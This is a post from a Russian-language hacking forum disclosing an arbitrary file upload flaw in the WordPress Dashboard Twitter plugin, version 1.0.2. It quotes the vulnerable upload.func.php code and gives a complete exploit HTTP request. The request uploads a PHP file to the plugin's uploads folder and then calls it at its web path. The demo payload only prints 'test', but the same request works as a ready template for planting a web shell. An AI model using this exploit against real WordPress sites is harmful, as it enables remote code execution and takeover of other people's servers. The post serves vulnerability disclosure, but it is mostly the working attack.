Показать сообщение отдельно
Старый 10.10.2010, 18:45   #22
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию WordPress Plugin [WordPress Dashboard Twitter] Arbitrary File Upload Vulnerability

Plugin name: WordPress Dashboard Twitter (download)
Version: 1.0.2

Arbitrary File Upload

Vuln file: /wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php
PHP код:
<?php
switch( $_GET['action'] ) {
    case 
'upload-image':
        require_once( 
'../../../../wp-load.php' );
        
$uploaddir str_replace('inc/'''dirname__FILE__ ) . '/uploads/' );
        
$uploadfile $uploaddir wp_unique_filename($uploaddir$_FILES['userfile']['name']);
        
        if (
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
            echo 
"Uploaded.";
        } else {}
        break;
}
?>
Exploit:
Код:
POST http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php?action=upload-image HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8343976828233

-----------------------------8343976828233
Content-Disposition: form-data; name="userfile"; filename="thumb.php"
Content-Type: application/vcard

<?php
echo 'test';
?>
-----------------------------8343976828233
http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/uploads/thumb.php
RulleR вне форума   Ответить с цитированием